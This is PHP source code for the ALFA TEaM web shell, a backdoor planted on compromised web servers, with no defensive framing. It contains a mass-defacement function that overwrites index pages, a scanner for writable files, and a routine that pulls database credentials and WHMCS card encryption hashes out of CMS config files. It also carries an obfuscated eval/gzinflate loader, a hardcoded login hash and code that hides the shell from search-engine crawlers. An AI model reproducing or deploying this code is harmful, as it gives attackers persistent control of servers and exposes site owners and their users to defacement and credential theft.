function Alfa_Rewriter($dir, $file, $defpage, $m = 'index')
{
    if (!@is_writable($dir)) {
        return false;
    }
    if (!@is_readable($dir)) {
        return false;
    }
    $defpage = @file_get_contents($defpage);
    if ($m == 'index') {
        $indexs = array('index.php', 'index.htm', 'index.html', 'default.asp', 'default.aspx', 'index.asp', 'index.aspx', 'index.js');
        if (in_array(strtolower($file), $indexs)) {
            @file_put_contents($dir, $defpage);
            echo @is_file($dir) ? $dir . "<b><font color='red'>DeFaced...</b></font><br>" : '';
        }
    } elseif ($m == 'all') {
        @file_put_contents($dir, $defpage);
        echo @is_file($dir) ? $dir . "  <b><font color='red'>DeFaced...</b></font><br>" : '';
    }
}
function alfaGetDisFunc()
{
    alfahead();
    echo "<div class=\"header\">";
    $disfun = @ini_get('disable_functions');
    $s = explode(',', $disfun);
    $f = array_unique($s);
    echo "<center><br><b><font color=\"#7CFC00\">Disable Functions</font></b><pre><table border=\"1\"><tr><td align=\"center\" style=\"background-color: green;color: white;width:5%\">#</td><td align=\"center\" style=\"background-color: green;color: white;\">Func Name</td></tr>";
    $i = 1;
    foreach ($f as $s) {
        $s = trim($s);
        if (function_exists($s) || !is_callable($s)) {
            continue;
        }
        echo '<tr><td align="center" style="background-color: black;">' . $i . '</td>';
        echo '<td align="center" style="background-color: black;"><a style="text-decoration: none;" target="_blank" href="http://php.net/manual/en/function.' . str_replace('_', '-', $s) . '.php"><span class="disable_functions"><b>' . $s . '</b></span></a></td>';
        $i++;
    }
    echo "</table></center>";
    echo "</div>";
    alfafooter();
}
function Alfa_Create_A_Tag($action, $vals)
{
    $nulls = array();
    foreach ($vals as $key => $val) {
        echo '<a href=javascript:void(0) onclick="g(\'' . $action . '\',';
        for ($i = 1; $i <= $val[1] - 1; $i++) {
            $nulls[] = 'null';
        }
        $f = implode(',', $nulls);
        echo $f . ',\'' . $val[0] . '\');return false;">| ' . $key . ' | </a>';
        unset($nulls);
    }
}
function Alfa_Searcher($dir, $ext, $method)
{
    if (@is_readable($dir)) {
        if ($method == 'all') {
            $ext = '*';
        }
        if ($method == 'dirs') {
            $ext = '*';
        }
        $globFiles = @glob("{$dir}/*.{$ext}");
        $globDirs = @glob("{$dir}/*", GLOB_ONLYDIR);
        $blacklist = array();
        foreach ($globDirs as $dir) {
            if (!@is_readable($dir)) {
                continue;
            }
            @Alfa_Searcher($dir, $ext, $method);
        }
        switch ($method) {
            case "files":
                foreach ($globFiles as $file) {
                    if (@is_writable($file)) {
                        echo "{$file}<br>";
                    }
                }
                break;
            case "dirs":
                foreach ($globFiles as $file) {
                    if (@is_writable(dirname($file)) && !in_array(dirname($file), $blacklist)) {
                        echo dirname($file) . '<br>';
                        $blacklist[] = dirname($file);
                    }
                }
                break;
            case "all":
                foreach ($globFiles as $file) {
                    echo $file . '<br>';
                }
                break;
        }
        unset($blacklist);
    }
}
function AlfaiFrameCreator($f, $width = '100%', $height = '600px')
{
    return '<iframe src="' . $f . '" width="' . $width . '" height="' . $height . '" frameborder="0"></iframe>';
}
class AlfaCURL
{
    public $headers;
    public $user_agent;
    public $compression;
    public $cookie_file;
    public $proxy;
    public $path;
    public $ssl = false;
    public $curl_status = true;
    function __construct($cookies = false, $compression = 'gzip', $proxy = '')
    {
        if (!extension_loaded('curl')) {
            $curl_status = false;
            return false;
        }
        $this->headers[] = 'Accept: image/gif, image/x-bitmap, image/jpeg, image/pjpeg';
        $this->headers[] = 'Connection: Keep-Alive';
        $this->headers[] = 'Content-type: application/x-www-form-urlencoded;charset=UTF-8';
        $this->user_agent = 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)';
        $this->path = "ALFA_TEMPDIR/Alfa_cookies.txt";
        $this->compression = $compression;
        $this->proxy = $proxy;
        $this->cookies = $cookies;
        if ($this->cookies) {
            $this->cookie($this->path);
        }
    }
    function cookie($cookie_file)
    {
        if (_alfa_file_exists($cookie_file, false)) {
            $this->cookie_file = $cookie_file;
        } else {
            @fopen($cookie_file, 'w') or die($this->error('The cookie file could not be opened.'));
            $this->cookie_file = $cookie_file;
            @fclose($this->cookie_file);
        }
    }
    function Send($url, $method = "get", $data = "")
    {
        if (!$this->curl_status) {
            return false;
        }
        $process = curl_init($url);
        curl_setopt($process, CURLOPT_HTTPHEADER, $this->headers);
        curl_setopt($process, CURLOPT_HEADER, 0);
        curl_setopt($process, CURLOPT_USERAGENT, $this->user_agent);
        curl_setopt($process, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($process, CURLOPT_ENCODING, $this->compression);
        curl_setopt($process, CURLOPT_TIMEOUT, 30);
        if ($this->ssl) {
            curl_setopt($process, CURLOPT_SSL_VERIFYPEER, false);
            curl_setopt($process, CURLOPT_SSL_VERIFYHOST, false);
        }
        if ($this->cookies) {
            curl_setopt($process, CURLOPT_COOKIEFILE, $this->path);
            curl_setopt($process, CURLOPT_COOKIEJAR, $this->path);
        }
        if ($this->proxy) {
            curl_setopt($process, CURLOPT_PROXY, $this->proxy);
        }
        if ($method == 'post') {
            curl_setopt($process, CURLOPT_POSTFIELDS, $data);
            curl_setopt($process, CURLOPT_POST, 1);
            curl_setopt($process, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded'));
        }
        $return = curl_exec($process);
        curl_close($process);
        return $return;
    }
    function error($error)
    {
        echo "<center><div style='width:500px;border: 3px solid #FFEEFF; padding: 3px; background-color: #FFDDFF;font-family: verdana; font-size: 10px'><b>cURL Error</b><br>{$error}</div></center>";
        die;
    }
}
function getConfigHtml($cms)
{
    $content = '';
    $cms_array = array("wp" => "WordPress", "vb" => "vBulletin", "whmcs" => "Whmcs", "joomla" => "Joomla", "phpnuke" => "PHPNuke", "phpbb" => "PHPBB", "mybb" => "MyBB", "drupal" => "Drupal", "smf" => "SMF");
    $content = "<form onSubmit='g(\"GetConfig\",null,this.cms.value,this.path.value);return false;'><div class='txtfont'>Cms: </div> <select name='cms'style='width:100px;'>";
    foreach ($cms_array as $key => $val) {
        $content .= "<option value='{$key}' " . ($key == $cms ? 'selected=selected' : '') . ">{$val}</option>";
    }
    $content .= "</select> <div class='txtfont'>Path(installed cms/Config): </div> <input type='text' name='path' value='" . $_SERVER['DOCUMENT_ROOT'] . "/' size='30' /> <button class='button'>GetConfig</button>";
    $content .= "</form>";
    return $content;
}
function alfaGetConfig()
{
    $cms = $_POST['alfa1'];
    $path = trim($_POST['alfa2']);
    $config = array('wp' => array('file' => '/wp-config.php', 'host' => array("/define\\('DB_HOST',(\\s+)(?:'|\")(.*?)(?:'|\")\\);/", 2), 'dbname' => array("/define\\('DB_NAME',(\\s+)(?:'|\")(.*?)(?:'|\")\\);/", 2), 'dbuser' => array("/define\\('DB_USER',(\\s+)(?:'|\")(.*?)(?:'|\")\\);/", 2), 'dbpw' => array("/define\\('DB_PASSWORD',(\\s+)(?:'|\")(.*?)(?:'|\")\\);/", 2), 'prefix' => array("/table_prefix(\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3)), 'drupal' => array('file' => '/config.php', 'host' => array("/define\\('DB_HOSTNAME',(\\s+)(?:'|\")(.*?)(?:'|\")\\);/", 2), 'dbname' => array("/define\\('DB_DATABASE',(\\s+)(?:'|\")(.*?)(?:'|\")\\);/", 2), 'dbuser' => array("/define\\('DB_USERNAME',(\\s+)(?:'|\")(.*?)(?:'|\")\\);/", 2), 'dbpw' => array("/define\\('DB_PASSWORD',(\\s+)(?:'|\")(.*?)(?:'|\")\\);/", 2), 'prefix' => array("/define\\('DB_PREFIX',(\\s+)(?:'|\")(.*?)(?:'|\")\\);/", 2)), 'vb' => array('file' => '/includes/config.php', 'host' => array("/config\\['MasterServer'\\]\\['servername'\\](\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3), 'dbuser' => array("/config\\['MasterServer'\\]\\['username'\\](\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3), 'dbname' => array("/config\\['Database'\\]\\['dbname'\\](\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3), 'dbpw' => array("/config\\['MasterServer'\\]\\['password'\\](\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3), 'prefix' => array("/config\\['Database'\\]\\['tableprefix'\\](\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3)), 'phpnuke' => array('file' => '/config.php', 'host' => array('/dbhost(\\s+)=(\\s+)(?:\'|")(.*?)(?:\'|");/', 3), 'dbname' => array('/dbname(\\s+)=(\\s+)(?:\'|")(.*?)(?:\'|");/', 3), 'dbuser' => array('/dbuname(\\s+)=(\\s+)(?:\'|")(.*?)(?:\'|");/', 3), 'dbpw' => array('/dbpass(\\s+)=(\\s+)(?:\'|")(.*?)(?:\'|");/', 3), 'prefix' => array('/prefix(\\s+)=(\\s+)(?:\'|")(.*?)(?:\'|");/', 3)), 'smf' => array('file' => '/Settings.php', 'host' => array("/db_server(\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3), 'dbname' => array("/db_name(\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3), 'dbuser' => array("/db_user(\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3), 'dbpw' => array("/db_passwd(\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3), 'prefix' => array("/db_prefix(\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3)), 'whmcs' => array('file' => '/configuration.php', 'host' => array("/db_host(\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3), 'dbname' => array("/db_name(\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3), 'dbuser' => array("/db_username(\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3), 'dbpw' => array("/db_password(\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3), 'cc_encryption_hash' => array("/cc_encryption_hash(\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3)), 'joomla' => array('file' => '/configuration.php', 'host' => array("/\\\$host(\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3), 'dbname' => array("/\\\$db(\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3), 'dbuser' => array("/\\\$user(\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3), 'dbpw' => array("/\\\$password(\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3), 'prefix' => array("/\\\$dbprefix(\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3)), 'phpbb' => array('file' => '/config.php', 'host' => array("/dbhost(\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3), 'dbname' => array("/dbname(\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3), 'dbuser' => array("/dbuser(\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3), 'dbpw' => array("/dbpasswd(\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3), 'prefix' => array("/table_prefix(\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3)), 'mybb' => array('file' => '/inc/config.php', 'host' => array("/config\\['database'\\]\\['hostname'\\](\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3), 'dbname' => array("/config\\['database'\\]\\['database'\\](\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3), 'dbuser' => array("/config\\['database'\\]\\['username'\\](\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3), 'dbpw' => array("/config\\['database'\\]\\['password'\\](\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3), 'prefix' => array("/config\\['database'\\]\\['table_prefix'\\](\\s+)=(\\s+)(?:'|\")(.*?)(?:'|\");/", 3)));
    $data = array();
    $srch_host = $config[$cms]['host'][0];
    $srch_user = $config[$cms]['dbuser'][0];
    $srch_name = $config[$cms]['dbname'][0];
    $srch_pw = $config[$cms]['dbpw'][0];
    $prefix = $config[$cms]['prefix'][0];
    $file = $config[$cms]['file'];
    $chost = $config[$cms]['host'][1];
    $cuser = $config[$cms]['dbuser'][1];
    $cname = $config[$cms]['dbname'][1];
    $cpw = $config[$cms]['dbpw'][1];
    $cprefix = $config[$cms]['prefix'][1];
    if (@is_dir($path) || _alfa_is_dir($path)) {
        $file = $path . $file;
    } elseif (@is_file($path) || _alfa_is_dir($path, "-e")) {
        $file = $path;
    } else {
        return false;
    }
    $file = __read_file($file);
    if (preg_match($srch_host, $file, $mach)) {
        $data['host'] = $mach[$chost];
    }
    if (preg_match($srch_user, $file, $mach)) {
        $data['user'] = $mach[$cuser];
    }
    if (preg_match($srch_name, $file, $mach)) {
        $data['dbname'] = $mach[$cname];
    }
    if (preg_match($srch_pw, $file, $mach)) {
        $data['password'] = $mach[$cpw];
    }
    if (isset($prefix)) {
        if (preg_match($prefix, $file, $mach)) {
            $data['prefix'] = $mach[$cprefix];
        }
    }
    if ($cms == 'whmcs') {
        if (preg_match($config[$cms]['cc_encryption_hash'][0], $file, $mach)) {
            $data['cc_encryption_hash'] = $mach[3];
        }
    }
    echo json_encode($data);
}
if (empty($_POST['a'])) {
    if (isset($default_action) && function_exists('alfa' . $default_action)) {
        $_POST['a'] = $default_action;
    } else {
        $_POST['a'] = 'FilesMan';
    }
}
if (!empty($_POST['a']) && function_exists('alfa' . $_POST['a'])) {
    call_user_func('alfa' . $_POST['a']);
}
exit;


Original code

<?php
$GLOBALS['NeUSMyPGXP'] = array(
	'usmfzmlHFCje' => 'admin',//login username
	'paLDRhHfAovu' => 'a6f452ec3293d7fb72c5b677257b20ec',//login password (MD5)... ehsan
	'saEuEgnDlHuL' => '1',//safe mode.. 0 = allow, 1 = deny
	'logXKTfQPNcx' => 'gui',//safe mode type.. gui = login and HTTP errors accepted: 500, 404, 403
	'shiJVQhUrFkw' => '1',//show icons.. 0 = not show, 1 = show
	'pogkUzMiAjqB' => true,//POST encryption
);

$XDmfxOnhck='fu'.'nct'.'ion'.'_'.'e'.'x'.'is'.'ts'.'';$RxPWPyQqTL='cha'.'r'.'Cod'.'e'.'A'.'t'.'';$CyvIHOdCHU='e'.'va'.'l'.'';$jgpUDiTPrk='g'.'zi'.'nf'.'l'.'at'.'e'.'';if(!$XDmfxOnhck('bas'.'e'.'6'.'4_e'.'ncod'.'e'.'')){function nIWUkxhnhj($data){if(empty($data))return;$b64='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';$o1 = $o2 = $o3 = $h1 = $h2 = $h3 = $h4 = $bits = $i = 0;$ac = 0;$enc = '';$tmp_arr = array();if(!$data){return $data;}do{$o1 = $RxPWPyQqTL($data, $i++);$o2 = $RxPWPyQqTL($data, $i++);$o3 = $RxPWPyQqTL($data, $i++);$bits = $o1 << 16 | $o2 << 8 | $o3;$h1 = $bits >> 18 & 0x3f;$h2 = $bits >> 12 & 0x3f;$h3 = $bits >> 6 & 0x3f;$h4 = $bits & 0x3f;$tmp_arr[$ac++] = charAt($b64, $h1).charAt($b64, $h2).charAt($b64, $h3).charAt($b64, $h4);} while ($i < strlen($data));$enc = implode($tmp_arr, '');$r = (strlen($data) % 3);return ($r ? substr($enc, 0, ($r - 3)) : $enc).substr('===', ($r || 3));}function charCodeAt($data, $char){ return ord(substr($data, $char, 1));}function charAt($data, $char){return substr($data, $char, 1);}}else{function nIWUkxhnhj($s){$b='bas'.'e'.'6'.'4_e'.'ncod'.'e'.'';return $b($s);}}if(!$XDmfxOnhck('b'.'ase'.'6'.'4_deco'.'d'.'e')){function QFdAWqZnUX($input){if(empty($input))return;$keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";$chr1 = $chr2 = $chr3 = "";$enc1 = $enc2 = $enc3 = $enc4 = "";$i = 0;$output = "";$input = preg_replace("[^A-Za-z0-9\+\/\=]", "", $input);do{$enc1 = strpos($keyStr, substr($input, $i++, 1));$enc2 = strpos($keyStr, substr($input, $i++, 1));$enc3 = strpos($keyStr, substr($input, $i++, 1));$enc4 = strpos($keyStr, substr($input, $i++, 1));$chr1 = ($enc1 << 2) | ($enc2 >> 4);$chr2 = (($enc2 & 15) << 4) | ($enc3 >> 2);$chr3 = (($enc3 & 3) << 6) | $enc4;$output = $output . chr((int) $chr1);if ($enc3 != 64) {$output = $output . chr((int) $chr2);}if ($enc4 != 64) {$output = $output . chr((int) $chr3);}$chr1 = $chr2 = $chr3 = "";$enc1 = $enc2 = $enc3 = $enc4 = "";}while($i < strlen($input));return $output;}}else{function QFdAWqZnUX($s){$b='b'.'ase'.'6'.'4_deco'.'d'.'e';return $b($s);}}$gEleJRqGNj='create_fun'.'ct'.'io'.'n';$oFcbuslxiL = $gEleJRqGNj('$cq',$CyvIHOdCHU.'('.$jgpUDiTPrk.'('.'Q'.'FdAW'.'qZ'.'n'.'U'.'X'.''.'($cq)'.')'.')'.';');

/* ufBAyNiLYhXtEhSseNmZlGuuOwOGcBLTnsgEApHxXujFVanOXqNpNWAMnYLMAGHaHTpIuoJkmboVlvpvaebpEaoskOINIUDeEhGI */ /* You're killing me again 🎧 Am I still in your head ? 🎧 You used to light me up 🎧 Now you shut me down -- Solevisible */ @session_start();function __ZW5jb2Rlcg($s){return nIWUkxhnhj($s);}function __ZGVjb2Rlcg($s){return QFdAWqZnUX($s);}$GLOBALS['DB_NAME'] = $GLOBALS['NeUSMyPGXP'];$check = false;if(!isset($_SESSION["alfa_settings_signature"])){$check = true;}else{if($_SESSION["alfa_settings_signature"] != md5(print_r($GLOBALS['DB_NAME'], true))){$check = true;}}if($check){$_SESSION["alfa_settings_signature"] = md5(print_r($GLOBALS['DB_NAME'], true));foreach($GLOBALS['NeUSMyPGXP'] as $key => $value){$prefix = substr($key, 0, 2);if($prefix == "us"){$GLOBALS['DB_NAME']["user"] = $value;$GLOBALS['DB_NAME']["user_rand"] = $key;}elseif($prefix == "pa"){$GLOBALS['DB_NAME']["pass"] = $value;$GLOBALS['DB_NAME']["pass_rand"] = $key;}elseif($prefix == "sa"){$GLOBALS['DB_NAME']["safemode"] = $value;$GLOBALS['DB_NAME']["safemode_rand"] = $key;}elseif($prefix == "lo"){$GLOBALS['DB_NAME']["login_page"] = $value;$GLOBALS['DB_NAME']["login_page_rand"] = $key;}elseif($prefix == "sh"){$GLOBALS['DB_NAME']["show_icons"] = $value;$GLOBALS['DB_NAME']["show_icons_rand"] = $key;}elseif($prefix == "po"){$GLOBALS['DB_NAME']["post_encryption"] = $value;$GLOBALS['DB_NAME']["post_encryption_rand"] = $key;}}$_SESSION["alfa_db_settings"] = $GLOBALS['DB_NAME'];}else{$GLOBALS['DB_NAME'] = $_SESSION["alfa_db_settings"];}unset($GLOBALS['NeUSMyPGXP']); if(!isset($_SERVER["HTTP_HOST"]))exit();


if(!empty($_SERVER['HTTP_USER_AGENT'])){$userAgents = array("Google","Slurp","MSNBot","ia_archiver","Yandex","Rambler","bot","spider");if(preg_match('/'.implode('|',$userAgents).'/i',$_SERVER['HTTP_USER_AGENT'])){header('HTTP/1.0 404 Not Found');exit;}}
if(!isset($GLOBALS['DB_NAME']['user']))exit('$GLOBALS[\'DB_NAME\'][\'user\']');
if(!isset($GLOBALS['DB_NAME']['pass']))exit('$GLOBALS[\'DB_NAME\'][\'pass\']');
if(!isset($GLOBALS['DB_NAME']['safemode']))exit('$GLOBALS[\'DB_NAME\'][\'safemode\']');
if(!isset($GLOBALS['DB_NAME']['login_page']))exit('$GLOBALS[\'DB_NAME\'][\'login_page\']');
if(!isset($GLOBALS['DB_NAME']['show_icons']))exit('$GLOBALS[\'DB_NAME\'][\'show_icons\']');
if(!isset($GLOBALS['DB_NAME']['post_encryption']))exit('$GLOBALS[\'DB_NAME\'][\'post_encryption\']');
date_default_timezone_set('Asia/Tehran');
define("__ALFA_MD5NAME__", md5($_SERVER["SCRIPT_FILENAME"]));
define("__ALFA_VERSION__", "3.0.2");
define("__LAST_CWD__", "last_cwd_".__ALFA_MD5NAME__);
define("__PATH_HISTORY__", "path_history_".__ALFA_MD5NAME__);
define("__ALFA_POST_ENCRYPTION__", (isset($GLOBALS["DB_NAME"]["post_encryption"])&&$GLOBALS["DB_NAME"]["post_encryption"]==true?true:false));
$GLOBALS['__ALFA_COLOR__'] = array(
		"shell_border" => array(
			"key_color" => "#0E304A",
			"multi_selector" => array(
				".header" => "border: 7px solid {color}",
				"#meunlist" => "border-color: {color}",
				"#hidden_sh" => "background-color: {color}",
				".ajaxarea" => "border: 1px solid {color}",
				".foot" => "border-color: {color}",
			)
		),
		"header_vars" => "#27979B",
		"header_values" => "#67ABDF",
		"header_on" => "#00FF00",
		"header_off" => "#ff0000",
		"header_none" => "#00FF00",
		"home_shell" => "#ff0000",
		"home_shell:hover" => array(
			"key_color" => "#FFFFFF",
			"multi_selector" => array(
				".home_shell:hover" => "color: {color};",
			)
		),
		"back_shell" => "#efbe73",
		"back_shell:hover" => array(
			"key_color" => "#FFFFFF",
			"multi_selector" => array(
				".back_shell:hover" => "color: {color};",
			)
		),
		"header_pwd" => "#00FF00",
		"header_pwd:hover" => array(
			"key_color" => "#FFFFFF",
			"multi_selector" => array(
				".header_pwd:hover" => "color: {color};",
			)
		),
		"header_drive" => "#00FF00",
		"header_drive:hover" => array(
			"key_color" => "#FFFFFF",
			"multi_selector" => array(
				".header_drive:hover" => "color: {color};",
			)
		),
		"header_show_all" => "#00FF00",
		"disable_functions" => "#ff0000",
		"footer_text" => "#27979B",
		"menu_options" => "#27979B",
		"menu_options:hover" => array(
			"key_color" => "#646464",
			"multi_selector" => array(
				".menu_options:hover" => "background-color: {color};font-weight: unset;",
			)
		),
		"options_list" => array(
			"key_color" => "#00FF00",
			"multi_selector" => array(
				".ajaxarea .header center a" => "color: {color};",
			)
		),
		"options_list:hover" => array(
			"key_color" => "#FFFFFF",
			"multi_selector" => array(
				".ajaxarea .header center a:hover" => "color: {color};",
			)
		),
		"options_list_header" => array(
			"key_color" => "#59cc33",
			"multi_selector" => array(
				".txtfont_header" => "color: {color};",
			)
		),
		"options_list_text" => array(
			"key_color" => "#FFFFFF",
			"multi_selector" => array(
				".txtfont,.tbltxt" => "color: {color};",
			)
		),
		"Alfa+" => array(
			"key_color" => "#27E8AE",
			"multi_selector" => array(
				".alfa_plus" => "color: {color};font-weight: unset;",
			)
		),
		"hidden_shell_text" => array(
			"key_color" => "#00FF00",
			"multi_selector" => array(
				"#hidden_sh a" => "color: {color};",
			)
		),
		"hidden_shell_version" => "#ff0000",
		"shell_name" => "#FF0000",
		"main_row:hover" => array(
			"key_color" => "#646464",
			"multi_selector" => array(
				".main tr:hover" => "background-color: {color};",
			)
		),
		"main_header" => array(
			"key_color" => "#FFFFFF",
			"multi_selector" => array(
				".main th" => "color: {color};",
			)
		),
		"main_name" => array(
			"key_color" => "#FFFFFF",
			"multi_selector" => array(
				".main .main_name" => "color: {color};font-weight: unset;",
			)
		),
		"main_size" => "#67ABDF",
		"main_modify" => "#67ABDF",
		"main_owner_group" => "#67ABDF",
		"main_green_perm" => "#25ff00",
		"main_red_perm" => "#FF0000",
		"main_white_perm" => "#FFFFFF",
		"beetween_perms" => "#FFFFFF",
		"main_actions" => array(
			"key_color" => "#FFFFFF",
			"multi_selector" => array(
				".main .actions" => "color: {color};",
			)
		),
		"menu_options:hover" => array(
			"key_color" => "#646464",
			"multi_selector" => array(
				".menu_options:hover" => "background-color: {color};font-weight: unset;",
			)
		),
		"minimize_editor_background" => array(
			"key_color" => "#0e304a",
			"multi_selector" => array(
				".minimized-wrapper" => "background-color: {color};",
			)
		),
		"minimize_editor_text" => array(
			"key_color" => "#f5deb3",
			"multi_selector" => array(
				".minimized-text" => "color: {color};",
			)
		),
		"editor_border" => array(
			"key_color" => "#0e304a",
			"multi_selector" => array(
				".editor-explorer,.editor-modal" => "border: 2px solid {color};",
			)
		),
		"editor_background" => array(
			"key_color" => "rgba(0, 1, 23, 0.94)",
			"multi_selector" => array(
				".editor-explorer,.editor-modal" => "background-color: {color};",
			)
		),
		"editor_header_background" => array(
			"key_color" => "rgba(21, 66, 88, 0.93)",
			"multi_selector" => array(
				".editor-header" => "background-color: {color};",
			)
		),
		"editor_header_text" => array(
			"key_color" => "#00ff7f",
			"multi_selector" => array(
				".editor-path" => "color: {color};",
			)
		),
		"editor_header_button" => array(
			"key_color" => "#1d5673",
			"multi_selector" => array(
				".close-button, .editor-minimize" => "background-color: {color};",
			)
		),
		"editor_actions" => array(
			"key_color" => "#FFFFFF",
			"multi_selector" => array(
				".editor_actions" => "color: {color};",
			)
		),
		"editor_file_info_vars" => array(
			"key_color" => "#FFFFFF",
			"multi_selector" => array(
				".editor_file_info_vars" => "color: {color};",
			)
		),
		"editor_file_info_values" => array(
			"key_color" => "#67ABDF",
			"multi_selector" => array(
				".filestools" => "color: {color};",
			)
		),
		"editor_history_header" => array(
			"key_color" => "#14ff07",
			"multi_selector" => array(
				".hheader-text,.history-clear" => "color: {color};",
			)
		),
		"editor_history_list" => array(
			"key_color" => "#03b3a3",
			"multi_selector" => array(
				".editor-file-name" => "color: {color};",
			)
		),
		"editor_history_selected_file" => array(
			"key_color" => "rgba(49, 55, 93, 0.77)",
			"multi_selector" => array(
				".is_active" => "background-color: {color};",
			)
		),
		"editor_history_file:hover" => array(
			"key_color" => "#646464",
			"multi_selector" => array(
				".file-holder > .history:hover" => "background-color: {color};",
			)
		),
		"input_box_border" => array(
			"key_color" => "#0E304A",
			"multi_selector" => array(
				"input[type=text],textarea" => "border: 1px solid {color}",
			)
		),
		"input_box_text" => array(
			"key_color" => "#999999",
			"multi_selector" => array(
				"input[type=text],textarea" => "color: {color};",
			)
		),
		"input_box:hover" => array(
			"key_color" => "#27979B",
			"multi_selector" => array(
				"input[type=text]:hover,textarea:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};",
			)
		),
		"select_box_border" => array(
			"key_color" => "#0E304A",
			"multi_selector" => array(
				"select" => "border: 1px solid {color}",
			)
		),
		"select_box_text" => array(
			"key_color" => "#FFFFEE",
			"multi_selector" => array(
				"select" => "color: {color};",
			)
		),
		"select_box:hover" => array(
			"key_color" => "#27979B",
			"multi_selector" => array(
				"select:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};",
			)
		),
		"button_border" => array(
			"key_color" => "#27979B",
			"multi_selector" => array(
				"input[type=submit],.button,#addup" => "border: 1px solid {color};",
			)
		),
		"button:hover" => array(
			"key_color" => "#27979B",
			"multi_selector" => array(
				"input[type=submit]:hover" => "box-shadow:0 0 4px {color};border:2px solid {color};",
				".button:hover,#addup:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};",
			)
		),
		"outputs_text" => array(
			"key_color" => "#67ABDF",
			"multi_selector" => array(
				".ml1" => "color: {color};",
			)
		),
		"outputs_border" => array(
			"key_color" => "#0E304A",
			"multi_selector" => array(
				".ml1" => "border: 1px solid {color};",
			)
		),
		"uploader_border" => array(
			"key_color" => "#0E304A",
			"multi_selector" => array(
				".inputfile" => "box-shadow:0 0 4px {color};border:1px solid {color};",
			)
		),
		"uploader_background" => array(
			"key_color" => "#0E304A",
			"multi_selector" => array(
				".inputfile strong" => "background-color: {color};",
			)
		),
		"uploader_text_right" => array(
			"key_color" => "#FFFFFF",
			"multi_selector" => array(
				".inputfile strong" => "color: {color};",
			)
		),
		"uploader_text_left" => array(
			"key_color" => "#25ff00",
			"multi_selector" => array(
				".inputfile span" => "color: {color};",
			)
		),
		"uploader:hover" => array(
			"key_color" => "#27979B",
			"multi_selector" => array(
				".inputfile:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};",
			)
		),
		"uploader_progress_bar" => array(
			"key_color" => "#ff0000",
			"multi_selector" => array(
				"#up_bar" => "background-color: {color};",
			)
		),
		"mysql_tables" => "#00FF00",
		"mysql_table_count" => "#67ABDF",
		"copyright" => "#ff0000",
		"scrollbar" => array(
			"key_color" => "#1e82b5",
			"multi_selector" => array(
				"*::-webkit-scrollbar-thumb" => "background-color: {color};",
			)
		),
		"scrollbar_background" => array(
			"key_color" => "#000115",
			"multi_selector" => array(
				"*::-webkit-scrollbar-track" => "background-color: {color};",
			)
		),
);
$GLOBALS['__file_path'] = str_replace('\\','/',trim(preg_replace('!\(\d+\)\s.*!', '', __FILE__)));
$config = array('AlfaUser' => $GLOBALS['DB_NAME']['user'],'AlfaPass' => $GLOBALS['DB_NAME']['pass'],'AlfaProtectShell' => $GLOBALS['DB_NAME']['safemode'],'AlfaLoginPage' => $GLOBALS['DB_NAME']['login_page']);
@session_start();
if($config['AlfaProtectShell']){
$SERVER_SIG = (isset($_SERVER["SERVER_SIGNATURE"])?$_SERVER["SERVER_SIGNATURE"]:"");
$Eform='<form method="post"><input style="margin:0;background-color:#fff;border:1px solid #fff;" type="password" name="password"></form>';
if($config['AlfaLoginPage'] == 'gui'){
if(@$_SESSION["AlfaUser"] != $config['AlfaUser'] && @$_SESSION["AlfaPass"] != @md5($config['AlfaPass'])){
if(@$_POST["usrname"]==$config['AlfaUser'] && @md5($_POST["password"])==$config['AlfaPass']){
@$_SESSION["AlfaUser"] = $config['AlfaUser'];
@$_SESSION["AlfaPass"] = @md5($config['AlfaPass']);
@header('location: '.$_SERVER["PHP_SELF"]);
}
echo '
<style>
body{background: black;}
#loginbox { font-size:11px; color:green; right:85px; width:1200px; height:200px; border-radius:5px; -moz-boder-radius:5px; position:fixed; top:250px; }
#loginbox td { border-radius:5px; font-size:11px; }
</style>
<title>~ ALFA TEaM Shell-v'.__ALFA_VERSION__.' ~</title><center>
<center><img style="border-radius:100px;" width="500" height="250" alt="" src="http://solevisible.com/images/alfa-iran.png" /></center>
